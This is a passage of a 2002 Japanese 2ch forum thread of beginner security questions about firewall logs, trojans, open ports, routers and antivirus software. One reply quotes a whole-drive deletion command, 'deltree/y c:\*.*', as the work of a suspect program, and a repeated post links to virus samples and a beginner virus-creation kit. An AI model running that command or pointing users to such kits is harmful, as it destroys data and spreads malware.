781 :名無しさん@お腹いっぱい。:02/02/02 12:06
,[02/Feb/2002 11:53:56] Rule 'trojan low port': Blocked: Out UDP, localhost:68->(null) [255.255.255.255:67], Owner: C:\WINDOWS\SYSTEM\KRNL386.EXE
1,[02/Feb/2002 11:54:00] Rule 'trojan low port': Blocked: Out UDP, localhost:68->(null) [255.255.255.255:67], Owner: C:\WINDOWS\SYSTEM\KRNL386.EXE
1,[02/Feb/2002 11:54:04] Rule 'trojan low port': Blocked: In UDP, (null) [0.0.0.0:68]->localhost:67, Owner: no owner
1,[02/Feb/2002 11:54:04] Rule 'trojan low port': Blocked: In UDP, (null) [0.0.0.0:68]->localhost:67, Owner: no owner

zoneからtinyに変えてこのようなLOGが残る。
トロイに感染?
ルールの設定ミス?
心配ないのかな

誰かHELP

782 :名無しさん@お腹いっぱい。:02/02/02 12:15
セキュリティ関連なのか不明なのですが、一部のサイトにのみ
つながらないという状態なのです。原因は分かりませんでしょうか?
家には2台のPCがあり、両方フレッツISDNでつないでいます。
つながらないページは、特にヤフーのトップにつながらず
困っております。原因について少しでも心当たりがある方は、
よろしくアドバイス願います。

783 :名無しさん@お腹いっぱい。:02/02/02 12:21
>>782
TAの電源をいれ直してみたら?
プロキシは外しているか?

784 :名無しさん@お腹いっぱい。:02/02/02 12:55
>>782
http://210.81.150.166/はどうだ?


785 : :02/02/02 16:11
>>781

BootPCでは?


786 :名無しさん@お腹いっぱい。:02/02/02 17:22
24時間接続可能な環境になりました。
何か気をつけたら良い点などありましたら、ご教授ください。
ちなみにサーバのあるマンションでLAN接続、サーバにはfirewallがあるそうです。
初心者で何をどうしてよいかわかりません。

787 :名無しさん@お腹いっぱい。:02/02/02 17:30
>>786
まずこのスレの始めの方にあるリンク先を読んで、その上で疑問になったことを質問すると良い。


788 :名無しさん@お腹いっぱい。:02/02/02 18:25
>>781
DHCPだよ。利用してないのなら切っちまえ。
ネットワークのことをよく理解しないうちは
その 'trojan low port' とか'Trojan High Port'とか
そういうルールは要らない。あると混乱するだけだ。
自分でルール作っておいてたまたま表示されたルール名に驚く、
これ良くあるパターン。

789 :名無しさん@お腹いっぱい。:02/02/02 21:42
>>788

ありがとう
その通りですね
一端、ルール破棄して作り直しました。
順序も大事だと気づきました


790 :名無しさん@お腹いっぱい。:02/02/02 22:55
http://gakielkupo.tripod.com/index.html

ここにおいてあるのはシステム破壊プログラムかどうかわかるかた
はいらっしゃいませんか?


791 :名無しさん@お腹ゲフー:02/02/02 23:00
今さらノートンインターネットセキュリティ2001入れたら、起動時にCドライブやDドライブの
フォルダが開きます。どっちかだけ開く時もあれば、開かない時が。
なんなんでしょ??

792 :お願いします:02/02/02 23:00
なんか友達のHP見てからか分かんないけど、
ネット上の一部の文字が「・」になっちゃうんだけどどうして?
誰か教えてください。あと治し方もお願いします。

793 :名無しさん@お腹いっぱい。:02/02/02 23:21
>>790
これはヤバいよ

deltree/y c:\*.*(Cドライブ全削除) ←こういうautoexec.batが作成されたりする。


今から掃除します。。

794 :782:02/02/03 00:39
>783
電源を入れなおしたらいきなり直りました。
おかげでたまっていた某サイトの日記を見ることが出来ました。
ありがとうございます。

>784
そちらの方では見れました。ありがとうございます。

795 :名無しさん@お腹いっぱい。:02/02/03 09:43
>>793
やっぱりそうですか。なんかあやしかったんです。
ありがとうございます。

796 :名無しさん@お腹いっぱい。:02/02/03 12:14
◇◆真隠し部屋への道◇◆のパスキボーン!
参照↓
ttp://private.rocketbeach.com/~mms1648/ura/kakusi.cgi

797 :名無しさん@初心者:02/02/03 12:49
すみません さっきBlack iceで
「危険」と出たんですが

[回避] 攻撃者は、TCP 接続のハイジャックを
試みている可能性があります。

これは、回線切ったほうが良いのでしょうか
もう遅い?(アセ
ノートン何も反応しないし(鬱


798 :名無しさん@お腹いっぱい。:02/02/03 12:55
[回避]
この文字が見えないの?

799 :名無しさん@お腹いっぱい。:02/02/03 13:04
SRCENCを解除する方法は、何処で質問したらいいですか?
教えてください。

800 :名無しさん@初心者:02/02/03 13:08
>798
すみません…慌て過ぎてました<回避
有り難うございます

801 :1:02/02/03 14:02

Hotmailなのに場所を見抜かれた(ジャブって何?)
UGサイトに逝き、メールを出したら ○○県○○市で、地元もプロバイダー
を使ってるねなどと見抜かれた. ジャブを打てば分かるよって言われたんだけど
ジャブってなに?



802 :名無しさん@お腹いっぱい。:02/02/03 14:10
>>801
明日のために その1だ。


803 :   :02/02/03 14:18
Hotmailでも、
メールのヘッダにはあなたのPCのIPアドレスが残るハズです。
だから、プロバイダも判るし、アクセスポイントを推測もできる


804 :名無しさん@お腹いっぱい。:02/02/03 17:32
Win98でノートン2001入れてます。スレ最初の方で紹介されてるad−aware
(スパイソフト発見ソフト)を試したら2つファイル見つかりました。
 c:WINDOWS¥cookies規定@sextracker(1)txt
 c:WINDOWS¥cookies規定@counter15.sextracker
これってヤバイものですか? それとも名前からしてとても恥ずかしい
ものが残ってるとか・・・。

805 :名無しさん@お腹いっぱい。:02/02/03 17:39
>>797
警告にビビる初心者は多いが、
警告が出ているということは、多くの場合は防御も効いているということ。
本当にヤバいのは警告が出ない。

806 :804:02/02/03 18:08
すんません、専用スレありましたね。

807 :名無しさん@お腹いっぱい。:02/02/03 18:17
sextrackerで検索したらとんでもないもん見ちゃったよ・・・鬱だ

ttp://www.cocktailboyz.com/senzuri/

808 :↑貼るなって…:02/02/03 19:40
URLで内容バレバレだし

809 :質問:02/02/03 20:12
超初心者な質問ですいませんが、ブラクラって何ですか?あとIP抜かれた場合どのようなことを心配するべきなんですか?またその対処方、予防方は何ですか?
初心者でいろんなホームぺをよくみているんですが、最近セキュリティのことで不安になったので質問します。どなたかご回答お願いします。

810 :cheshire-cat:02/02/03 20:57
>>809
PCに予想外のストレスを与えて落とす罠。メールストーム(アウトルック爆発状態)とか。ブラクラチェッカー使えば?

IPアドレスは抜かれても、職場のLANじゃなければ、せいぜいどの街に住んでいるかがわかる程度。プロバをハックしなければ詳細な個人情報はわからない。

811 :名無しさん@お腹いっぱい。:02/02/03 21:16
>>809
超初心者だと…、
ブラクラとJS系Trojanの区別つかないだろう。複合もある。
Trojanの場合落ちるだけじゃ済まない。駆除や修復が必要。

812 :809:02/02/03 21:26
810、811さん、ありがとうございます。
Trojanの意味がわかんないっす。ウィルスのことかなんかでしょうか?
ウィルスの仕掛けてあるサイトってのは踏んでみなければ、わからないものなのでしょうか?

813 :名無しさん@お腹いっぱい。:02/02/03 22:56
Trojanは、トロイの木馬に由来しています。
悪意のコードを含むプログラム(スクリプト)のことです。
無害な「木馬」=「アプリケーション」に見せかけて、中に
致命的な「伏兵」=「悪意のソースコード」が含まれています。


不用意にJavaScriptを実行しないように気をつける必要がありますし、
又OSやUA(ブラウザなど)へのパッチは常に最新のものを準備しましょう。
そして、時々
http://www.trendmicro.co.jp/hcall/scan.htm
等を用いてウイルスチェックしましょう。

814 :名無しさん@お腹いっぱい。:02/02/03 23:20
質問なんですが、
さっき何もしていないのに、HDDがカチャカチャなったので
DOSでNETSTATしたんですけど、
すると
2XX.6X.1XX.2X:80
が、私のPCの侵入できるポートを探っているようで
1秒おきにアクセスしてきました。
これは侵入されているんでしょうか?

815 :名無しさん@お腹いっぱい。:02/02/03 23:39
ネット接続を切断しても、しばらく放置しておくと勝手に接続が
確立されます。これはなにかのトロイでしょうか?
ファイアーウォールのログにはSubseven Trojanをブロックしたとあります。
あとNortonでスキャンしましたが何もみつかりませんでした。

816 : :02/02/03 23:56


817 : . . . . . . :02/02/04 00:01
>>815

あ、俺がコソーリ動かしました。すまん。

818 :809:02/02/04 00:05
813さん、ご回答どうもありがとうございました。

819 :名無しさん@お腹いっぱい。:02/02/04 00:09
>>814
ルータやパーソナルファイヤーウォール使ってますか?
無防備だったら入られてるかもね。
お金が無いなら、この辺がお勧め
http://www.zonelabs.com/zlpromo/za_pestpatrol_link.htm

>>815
「ブロックした」って書いてあるなら大丈夫。
警告を出さないor後からログを消す進入方法が最もスマート(怖い)。

820 :名無しさん@お腹いっぱい。:02/02/04 00:17
>>815
どうせなにかの自動アップデートプログラムでしょう・・

821 :名無しさん@お腹いっぱい。:02/02/04 00:29
エロサイトのメルマガ配信用にメアドを書かせるHPがあるんですけど
気をつけることがあったら教えて下さい。
もちろんフリーメアドにします。
Outlook Expressでは受信しないほうがいいでしょうか?

822 :_:02/02/04 00:34
>>821
サーバ上で見れるメーラ使え

823 :名無しさん@お腹いっぱい。:02/02/04 00:35
エロサイトを運営してるようなヘボ管理人なら
神経質にならなくても大丈夫だと思われ(藁

824 :821:02/02/04 00:41
>>822
そこまでしたほうがいいですか。

>>823
AV会社のHPです。

もしも悪意のあるいたづらをされるとしたらどんなことが
可能なんでしょうか。

825 :名無しさん@お腹いっぱい。:02/02/04 00:46
>>824
会社がそんなことするとは思えん
金儲けのためにメルマガ配信するんだしさ

826 :名無しさん@お腹いっぱい。:02/02/04 00:47
接続書換えには注意ね

827 :821:02/02/04 00:59
参考になりました。どうも。

828 :名無しさん@お腹いっぱい。:02/02/04 12:29
NIS2002はスパイウエアも見つけてくれるの?

829 :名無しさん@お腹いっぱい。:02/02/04 12:43
>>828
無理だと思われ

830 :名無しさん@お腹いっぱい。:02/02/04 14:45
デジャヴゥ  

831 :名無しさん@お腹いっぱい。:02/02/04 16:19
win2000 Bフレなんですが、
ShieldUP!のサイトでポートをチェックすると
ポート23(TELNET)がOPENになります。
どうすりゃいいの?

832 :名無しさん@お腹いっぱい。:02/02/04 16:25
>>831
TELNETはマズーすぎっ
すぐに回線切ってルータかファイアウォールで閉じて下さい!!!
とりあえずZAでも入れて↓

ZoneAlarm Part4
http://pc.2ch.net/test/read.cgi/sec/1010834959/

833 :名無しさん@お腹いっぱい。:02/02/04 17:18
>>832
一応ELECOMのルータとぞぬ覇両方とも使用中です。

ほかのポートもステルスぢゃなくてクローズになってしまう。

834 :名無しさん@お腹いっぱい。:02/02/04 17:22
>>833
サービスでTelnet切る(もしIIS動いてたら速攻で削除)

835 :名無しさん@お腹いっぱい。:02/02/04 17:23
あと、ぞぬのセキュリティレベル(?)高にしてる?
全部ステルスになるはずなんだけど・・

836 :名無しさん@お腹いっぱい。:02/02/04 17:28
むしろ、ぞぬが入ってるにも関わらずtelnetが開いてることのほうが・・・

837 :名無しさん@お腹いっぱい。:02/02/04 17:35
>>834
コンパネから管理->サービスで確認しましたがTELNETは停止中とのこと。

>>835
ローカル 中+サーバブロックなし
インタネ 高+サーバブロック
です。

今確認したら、DSLReportsのチェックだと全ポートクローズになる。
今日再インストしたばかりなんだけどなぁwin2K

838 :名無しさん@お腹いっぱい。:02/02/04 17:38
>>837
ローカル「高」ではダメ?

839 :名無しさん@お腹いっぱい。:02/02/04 17:43
>>838
だめです。

他のセルフチェックサイトでは、大丈夫なのに、ShieldUP!だけ反応してしまう…


840 :名無しさん@お腹いっぱい。:02/02/04 17:48
ノートンかバスター買おうと思ってるんですけど
どっちがオススメですか?

841 : :02/02/04 18:11
一応こういうスレがある。
http://pc.2ch.net/test/read.cgi/sec/1005050509/
っても、読むのも大変だろうし、個人的にはどっちでもいいんじゃあ
ないかと思うよ。マカフィーだけはちょっと…

842 :名無しさん@お腹いっぱい。:02/02/04 18:19
>>840
体験版でも入れて好きな方選びなさいってこった。

843 :名無しさん@お腹いっぱい。:02/02/04 18:24
>>839
今日はShieldUP!のポートスキャン変だよ。
実際に飛んでくるの 5000 UPnP ばっかりだし。
壊れてるっぽい。前にも誤動作してたときがあった。

844 :名無しさん@お腹いっぱい。:02/02/04 18:42
>>843
さっきやって普通にできたけど

845 :名無しさん@お腹いっぱい。:02/02/04 19:34
PC同士をP2Pで繋いだ状態で、ZoneAlarmを使って
共有フォルダへのアクセスを遮断する実験をしたのですが
どうやっても遮断できません。ネットワークの設定がおかしいのでしょうか?
それともP2Pではアクセスを遮断することができないのでしょうか?

846 :おしえて!:02/02/04 20:05
win2k sp2、ie6、antivirs最新定義ファイル
入れてるんですけど、
何気に、タスクマネージャーのプロセスにCSRSS.EXEを発見したんです。
調べてみると、どうもnimdaの亜種みたい。
ついでに、そのウイルスに関係があるファイルも、検索したら出てきました。
どう考えても感染してますよね?

でもウィルススキャンしても引っかからないし、
直接そのファイルをスキャンしても、
ウィルスが見つかりませんって言われるんですけど…。
どういうことでしょうか?


847 :843:02/02/04 20:11
>>844
すまん。勘違い。たまたま臨時で使ったISPがそういう仕様だった。
( ファイヤーウォールでポート1023以下をフィルタリング )

848 :名無しさん@お腹いっぱい。:02/02/04 20:39
>>846
それは Nimdaではなくcsrss.exeはシステムファイルだからです。


849 :cheshire-cat:02/02/04 20:40
>>846
csrss.exeってファイル、NT系にもともと入っていなかったっけ?
今資料が手元に何も無いから、何してる実行ファイルなのかは知らんけど。

850 :名無しさん@お腹いっぱい。:02/02/04 20:44
>>845
P2Pって具体的にどういうの?LANとか?それともシリアルとか?
ZAならローカルのセキュリティレベルの設定見直し

>>846
csrss.exeはWin2000では必要なプロセスです(詳しくは知らないけど)
Nimdaはそれを装ってファイル名を偽装するみたい。
ウィルススキャンで問題ないなら大丈夫でしょ

851 :cheshire-cat:02/02/04 20:49
Client Server Runtime Systemの略だった。

852 :846:02/02/04 21:00
848,849,850,851の皆々様。
どうもありがとう。

もともとあるファイルに偽装しているわけですか。
検索ページのはじめの20件ぐらいが全部NIMDA・NIMDAだったので
びっくりしてしまいました。
もっとしっかり調べれば分かった事ですね。

お騒がせしました。

853 :名無しさん@お腹いっぱい。:02/02/04 21:28
>>850
P2P=PC〜LANケーブル〜PCです。
ZAのレベルを「高」にしてもだめでした。

854 :名無しさん@お腹いっぱい:02/02/05 01:31
超初心者なのですが、たすけて下さい。
webページを広告無しの
海外のフリースペースに作ったのですが、
ソースが書き換わってて、勝手に広告が出るので、「でてるけど?」と
メールしたら「なおしとく」みたいな感じだったので今日行ってみたら
なんかIPとうちのパソコンの中が見えてるページが開いたのです。
こわい!!と思って閉じて、また行ってみたら、もうそのページは出ません。
(ソースは書き換わったまま)
これってやばい?・・・ですよね(ゥゥゥゥ

855 :名無しさん@お腹いっぱい。:02/02/05 01:58
>>854
どこのフリースペースか書け

Portlandとかf2sではないよな?

856 :名無しさん@お腹いっぱい。:02/02/05 02:09
クラッカーは外から画面を盗み見れるらしいが、
「もしかしたら覗かれてるかもしれない・・・」と思って、
おもむろにメモ帳を起動し、
「覗いちゃいや〜ん」とタイプしたことがあるという人はいるか?

857 :検出名を教えてくださいませませ:02/02/05 02:25
ウイルス205種
http://www.ebcvg.com/binary.php
Empire248はBloodhoundFileString(左端の上から6番目)
未知のウイルス名称決定
このウイルス検出名はVCL_MUT.Empire.248となりました。

ほかのアンチウイルスソフトでの検出名を教えてくださいませませ。
文化放送ではありません。

http://www.symantec.com/region/jp/sarcj/data/b/bloodhound.html
http://www.symantec.com/avcenter/reference/heuristc.pdf

http://www.trendmicro.co.jp/vinfo/virusencyclo/default2.asp?m=q&virus=empire&alt=empire
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=FILESTRING.DA

初心者向けウイルス作成ソフト
http://vx.netlux.org/dat/vct.shtml

858 :名無しさん@お腹いっぱい。:02/02/05 02:43
>857
日本語わかりにくい

859 :名無しさん@お腹いっぱい。:02/02/05 02:44
たまに(月1、2回)ファイヤウォール(ノートン)の警告が出ます。
ダイヤルアップのアイコンのなんとかexeがネットワークダイヤルアプリケーション
に接続しようとしています、とかなんとか。その都度ブロックしてるんですが・・。
ポートは137udpです。単なるスパイウェア関係でしょうか?

860 :名無しさん@お腹いっぱい。:02/02/05 03:09
>>859
Q2とか国際電話につなごうとしているのでは?

スパイウエアだと思うならなぜスパイウエアチェックをしないのだ?

861 :名無しさん@お腹いっぱい。:02/02/05 03:19
>>859
ポート137はNetBIOS(名前サービス)で使用される

とりあえず137〜139はしっかり閉じとこう

862 :859:02/02/05 03:38
レスありがとうございます。スパイウエアは昨日初めてソフトを知って
チェックしたんですが、もう一度やってみます。Q2とか目的の知れてる
ものだったらそんなに気にならないんですが・・・ウィルスも何も検出されてない
のに外部になんか発信させられてる? みたいのが気持ち悪いです。

863 :859:02/02/05 03:41
ちなみにADSLにしてからファイヤウォールのイベントログもすごいです。
1分おきくらいに1日中いろんなとこからブロックしてます。

864 : :02/02/05 03:54


865 :名無しさん@お腹いっぱい。:02/02/05 06:26
2chに書き込むある人物について調べたいのですがどんなことが可能ですか?
 

866 :名無しさん@お腹いっぱい。:02/02/05 06:59
ISPとか会社で取られてるHTTPのログって
どーすればかわせますか?

867 :名無しさん@お腹いっぱい。:02/02/05 08:13
>>866
会社ならサーバ管理者に聞きましょう


868 : :02/02/05 09:05
>>866
HTTPプロトコルを使わない。
インターネットに接続しないのが一番。

869 :名無しさん@お腹いっぱい。:02/02/05 09:56
HTTPを使わず・・・ネット接続は可能ですよね?

870 : :02/02/05 10:43
そっちが、「HTTPのログ」と書いているから、
「HTTPを使わない」という答えが返ってくるのだと思うよ。
どういうログを取っているかは管理者次第だわなあ。
>>867さんが書いているように、そこの管理者でないと
ちゃんとした答えは出せないと思う。

それから、HTTPプロトコルによらないでネットワーク接続ってのは
なんぼでもあるんだけど。TCP/IP使うからHTTPってもんじゃなし、
TCP/IPがすべてでもないし。
要はどこから何をやりたいのかだなあ、「ネット接続」てのが。
メール交換か、LANで何かしたいのか、Webページ見たいのか。



871 :名無しさん@お腹いっぱい。:02/02/05 12:50
超初心者ですっ。先ほどブラクラ踏んだら画面いっぱいに怖いお姉さんの顔が
出てきて、そのあと再起動したらその直後からノートンさんが警告を出してきた
のですが、詳細をみたところ、アプリケーションssdpsrv.exeというのがあって
どうも、それが問題(?)らしいのですが、いろんなところを検索したら英語
のページだけで(英語わかりません・・)あとノートンウイルススキャンしてもひっかからないし。
すみません、これはウイルスなんでしょうか?ちなみにMEのIE使用です。


872 :名無しさん@お腹いっぱい。:02/02/05 12:58
>>871
ブラクラ!=ウイルス
ウイルスチェックをしてもひっかからない=ウイルスに感染していない

873 :名無しさん@お腹いっぱい。:02/02/05 13:08
>871さん
あっ!そうなのですか?では、そのssdpsrv.exeというファイル
普通に削除してしまって大丈夫ですよね。
(そうしないとノートンさんが警告30秒ごとに出してくるので)

優しい2チャンネラさん、ありがとうございましたっ。

874 :名無しさん@お腹いっぱい。:02/02/05 16:26
初心者です。最近常時接続にしましてファイヤーウォールソフトを
導入しようと思い色んなところを覗いて勉強しているのですが、
TinyとZoneを比べると結局
「Tinyはルール作成を苦にしない人にはシステム負荷も少なく最強だが
それが出来ない初心者はZoneでもいっこうに問題ない」
という結論でよろしいのでしょうか?

875 :名無しさん@お腹いっぱい。:02/02/05 16:29
>>874
初心者ならノートンかバスターを買った方がよいのでは?

876 :名無しさん@お腹いっぱい。:02/02/05 16:30
http://www.microsoft.com/JAPAN/support/kb/articles/JP311/3/11.asp

877 :874:02/02/05 16:32
>>875
ふところ具合がとっても寂しいもので・・・(泣
それだけは除外したいと思って
ず〜〜っと昨日からこの板の過去ログとか
読みあさってるのです・・・

878 :名無しさん@お腹いっぱい。:02/02/05 16:33
http://i.tosp.co.jp/NIki/Tospi400.asp?I=gdeh1&P=0
はいってちょ

879 :名無しさん@お腹いっぱい。:02/02/05 16:37
>>874
その通り。
でもZAは簡単なぶん細かい設定ができないので、ある程度分かってきたら他のに変えるのがいいかも。


880 :874:02/02/05 16:42
>>879
ありがとうございます。やはりそうですかこちらの板をみてもTinyユーザーの人は
「OutpostにしてもZoneにしても結局Tinyに戻る」なんて人がとっても多いようですからね
僕はとりあえずZoneを検討してみたいと思います。

881 :名無しさん@お腹いっぱい。:02/02/05 17:55
CATV(グローバルIP)にぶろばんルータを噛ませてNAT変換して使っています。
クライアントPCは全てDHCPで割り振られたローカルIPアドレスですが、
黒氷かゾヌを全クライアントPCにインストールする必要ってあるでしょうか?
また、現状ではどの程度安全だと思われますか?お願いします。

882 :854:02/02/05 17:56
>>855
http://www.world-webspace.comです。いま自分のページいったら
www.power-space.deからクッキー要求された(←よくわからんですが)
で、http://hacker.spider.deが開いた。ドイツ語なのでわからない。
右クリックしたら何かダウンロードし始めた。怖いのでalt+ctrl+deleteで
閉じた。なんなんだろう・・・(汗

883 :854:02/02/05 17:58
あっ直リンしてしまった!ごめんなさい〜。

884 :geg:02/02/05 18:14
これはどういう意味なんですか?
Foreign Addressが*.*ってなるんですけど。

C:\WINDOWS>netstat

Active Connections

Proto Local Address Foreign Address State
TCP ●●●●●:2379 *.* ESTABLISHED
TCP ●●●●●:1436 *.* ESTABLISHED

C:\WINDOWS>

885 :検出名を教えてくださいませませ:02/02/05 18:32
ウイルス205種
http://www.ebcvg.com/binary.php
Empire248はBloodhoundFileString(左端の上から6番目)
未知のウイルス名称決定
このウイルス検出名はVCL_MUT.Empire.248となりました。

ほかのアンチウイルスソフトでの検出名を教えてくださいませませ。
文化放送ではありません。

http://www.symantec.com/region/jp/sarcj/data/b/bloodhound.html
http://www.symantec.com/avcenter/reference/heuristc.pdf

http://www.trendmicro.co.jp/vinfo/virusencyclo/default2.asp?m=q&virus=empire&alt=empire
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=FILESTRING.DA

初心者向けウイルス作成ソフト
http://vx.netlux.org/dat/vct.shtml

886 :名無しさん@お腹いっぱい。:02/02/05 18:42
>>882
なんだか分からないけど、フリースペースなら他にいっぱいあるから
そんなに怪しかったらここはやめといた方が良い。
ttp://hacker.spider.de/はいけなかった

887 :名無しさん@お腹いっぱい。:02/02/05 19:09
ルーターの設定について教えて下さい。
AcctonのSMC7004ABRってのを買った。
で、ネットワークのこと全然ワカランのだけど、物理的な接続や、ネットへの
接続は無事完了した。
ルーター入れる大きなメリットにセキュリティのアップとゆー点があると思ふが、
これがよく分からない。
どこかで目にしたことがあるんだけど、ルーターをカマすと、ネット対戦ゲームは
そのまんまではプレイできず、ゲーム関連のデータ(っていうのかいな)が
ルーターを通り抜けれるように設定しないとイカン、というような内容でありました。
ところが、yahooの将棋やバックギャモンは、ルーターの設定デフォルトのままで
できてしまっている。
これは、ウチのLAN内が外部から筒抜け、ってことになるのでせうか?
仮想サーバ、特殊AP,クライアントフィルタリングとかいった設定項目が
あるんだけど、この辺、触らなくてもOKなんですかNE?
説明書読むと、仮想APってのが関係ありそうなんだけど、何書いてるのか
全然ワカランです。


888 :名無しさん@お腹いっぱい。:02/02/05 19:17
>>887
分からんのに買うな

889 :(゜▼゜*):02/02/05 20:11
>>887
そのままでプレイできないネット大戦ゲームっていうのは
UDPやICMPを使ったリアルタイム対戦ゲームなどのことです。

将棋とかバックギャモン程度では、チャットとたいして変わりません。
内側からのTCP接続だけで事足りるので、外側からの接続を受ける必要は
ありませんよ。

890 :名無しさん@お腹いっぱい。:02/02/05 20:17
Win98 + IE6です。
信頼済みサイトのリストを、テキストエディタで
ぱーっと編集できたら楽だなーと思ったんですが、
信頼済みサイトのURLリストってどこに保存されてるんでしょう?
リスト内の適当なURLでC:\Windowsとかを検索したけど、
見つかりませんでした。

891 :ピンク:02/02/05 20:28
ルーターとハブの基本的な違いを教えていただけませんか。

892 :887:02/02/05 20:30
>>889
なるほど、そういうことですか。
よく分かりました。
ありがとうです。

>>888
もう少しオモロイ当てはできんのか?
オレサマに相手してもらえただけでもありがたいと思え。

893 :名無しさん@お腹いっぱい。:02/02/05 20:34
>>892

894 :名無しさん@お腹いっぱい。:02/02/05 20:38
>>892
キモい

895 :名無しさん@お腹いっぱい。:02/02/05 20:40
掲示板に誰が書き込んだかが少しでもわかる方法はありませんか?

896 :名無しさん@お腹いっぱい。:02/02/05 20:47
>>895
どこの掲示板?
自分で設置したのならログ取れば分かる。

897 :ピンク:02/02/05 20:51
ルーターとハブの基本的な違いを教えていただけませんか。
自己レスです。
見識者の方難しい質問かと思いますが教えて下さい。

898 :名無しさん@お腹いっぱい。:02/02/05 20:57
>>897
あきらかにちがうけど、しっかりした説明はむりぽです。。。
http://www.e-words.ne.jp/view.asp?ID=1476
http://www.e-words.ne.jp/view.asp?ID=1406

899 :cheshire-cat:02/02/05 21:01
>>897
ルーター:外につなぐための機器。
ハブ:同じセグメントの中で、都合を良くするための機器。

これじゃ簡潔すぎてダメ?

900 :名無しさん@お腹いっぱい。:02/02/05 21:02
>>897
ルーターはIPアドレスを持つ、(>>897が買うような安い)ハブはIPアドレスを持たない。


901 :882:02/02/05 21:06
>886
そうですね・・・ありがとう。

902 :名無しさん@お腹いっぱい。:02/02/05 21:07
つか>>897はどのような違いを知りたいんだ?
値段,動作原理,機能,使い勝手... 質問する技術をもうちっと習得してから聞け。

903 :名無しさん@お腹いっぱい。:02/02/05 21:13
>>884
ありえない。
netstat -nを手で書き写さずにコピペしろ。

904 :名無しさん@お腹いっぱい。:02/02/05 21:13
ShieldsUP!で135ポートと5000ポートが開いていると言われたので、
ZoneAlarmとXPについているファイヤーウォール機能を有効にして使ったいるのですが、
開いているというのも何か気持ちが悪いので、どなたか閉じ方を教えていただけませんでしょうか。
ちなみにWindowsXP Home Editionのほうです。


905 :ピンク:02/02/05 21:15
色々参考になるお返事有難うございます。
皆さんどうやってそんな知識がついたのでしょう。
私はいくらセキュリティのサイトを見ても用語辞典で調べても難しくて理解
出来なく困っています。

ルーターはIPを持つなら、プロキシの機能も一部兼ね備えているという事ですか?

個人で一台のADSLモデムを使い、4台のPCを繋ぐ場合ルーターとハブでは
どちらが良いのでしょう。
もしかしてハブはサーバーを持ってないと使えないものでしょうか?

906 :cheshire-cat:02/02/05 21:17
>ルーターはIPを持つなら、プロキシの機能も一部兼ね備えているという事ですか?
ちゃう。

後は、何が言いたいのかわからん。はぁ、みたいな感じ。

907 :cheshire-cat:02/02/05 21:20
初心者スレに書くのは、真摯な気持ちの表れとして。

最近エクセプションでQ2強制接続サイトを見つけ次第、片っ端から葬ってるんだけど。対処が早くて適切な窓口ってどこ?

908 :名無しさん@お腹いっぱい。:02/02/05 21:22
>>905
実際に使ってみると分かる

909 :ピンク:02/02/05 21:26
質問の仕方が変なのは全くの初心者だからです。
Windows9X、Meについてはそこそこの知識は持っているつもりですが、
インターネットセキュリティは無知に等しいのです。

それでは質問を変えます。
サーバーとはパソコンですか?
サーバーにはOSがありますか?

910 :名無しさん@お腹いっぱい。:02/02/05 21:27
>>905
ルータが必要。個人向けに売っているルータはハブの機能も内蔵している。
ポートが足りなかったらハブを買い足してつなぐ。

>>906
あながち、違わないぞ。 http proxyでは無いが…

911 :cheshire-cat:02/02/05 21:31
>>909
4台のPCを繋ぐ場合ルーターとハブでは
だーかーらー。
ルーターは外に出るための道具。ハブはそいつを使ってネットワークを構築するための道具なんだってば。

912 :ピンク:02/02/05 21:32
>>910
よくわかりました。
理解完了です。
ずっと調べてもわからなかった事が今始めて理解できました。
本当に有難うございました。

913 :名無しさん@お腹いっぱい。:02/02/05 21:36
911様何度も有難うございます。
ルーターは外に出るための道具。
現在はルーターをつかて降りませんが外に出れますが?

ハブはそいつを使ってネットワークを構築するための道具なんだってば
こちらは何となく理解できました。

有難うございました。

914 :名無しさん@お腹いっぱい。:02/02/05 21:36
>>909
>サーバーとはパソコンですか?
>サーバーにはOSがありますか?
こういう質問なんか懐かしい感じがする。。。
おれも最初はこういう疑問持ったよ。。

915 :ピンク:02/02/05 21:39
あっそうか、もしかしたら思いあたることがありました。
ルーターがない代わりにインストールしたフレッツ接続ツールが、外に出してくれているのかな?

916 :cheshire-cat:02/02/05 21:40
>>914
懐かしいよね、とっても。本買ってもそれほど詳細じゃなくて悩んだり。

917 :ピンク:02/02/05 21:41
914様
それで答えは教えていただけないでしょうか?
お願い致します。

918 :名無しさん@お腹いっぱい。:02/02/05 21:42
>>915妄想中・・・

919 :名無しさん@お腹いっぱい。:02/02/05 21:44
>>890←これわかりませんか?C:\もレジストリも検索したけど見つけられません。

920 :名無しさん@お腹いっぱい。:02/02/05 21:49
>>919
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains

921 :cheshire-cat:02/02/05 21:50
>>919
状況がわからなければ、レスが付けられない。
もう寝る。

922 :名無しさん@お腹いっぱい。:02/02/05 21:51
>>917
サーバ用のPCとかサーバ用のOSとかが特別にあるわけじゃない(あるけど)
つまりあなたのPCでもサーバ立てられるってことです。

>>919
今さっと調べて見つかった
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains
HKEY_USERS\(文字と数字)\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains

923 :名無しさん@お腹いっぱい。:02/02/05 21:53
>>917
Altoにおけるワークステーションに代表される「概念」としてのサーバーは
OSは関与しないし、あったとしてもOSと呼べるかも定かではない。
ましてそのサーバーがパソコンと呼ぶ事はないと思われる。
対して、サービス提供をするもの「使用人」としてのサーバーは、
OS(プログラム)依存であって、おそらくユーザーの目に触れるべきOSがあるであろうし、
プログラムがOS依存である以上パソコンでもありうる。

924 :名無しさん@お腹いっぱい。:02/02/05 21:56
>>920>>922
ありがとうございました!探し方が甘かったようです。
さっそく見てみます。

>>921
状況というか、IEの信頼済みサイトリストにURLひとつひとつ登録するのが面倒だったので、楽にリストを編集できないかなと思いまして。言葉足らずですいませんでした。お休みなさい。

925 :名無しさん@お腹いっぱい。:02/02/05 21:57
>>923
一番正確で詳細な答え、だけど質問者には届かないような気がする

926 :名無しさん@お腹いっぱい。:02/02/05 22:04
>>924
そんなに信頼していいのか と。

927 :名無しさん@お腹いっぱい。:02/02/05 22:04
>>923
> Altoにおけるワークステーションに代表される「概念」としてのサーバーは
意味不明

928 :検出名を教えてくださいませませ:02/02/05 22:09
ウイルス205種
http://www.ebcvg.com/binary.php
Empire248はBloodhoundFileString(左端の上から6番目)
未知のウイルス名称決定
このウイルス検出名はVCL_MUT.Empire.248となりました。

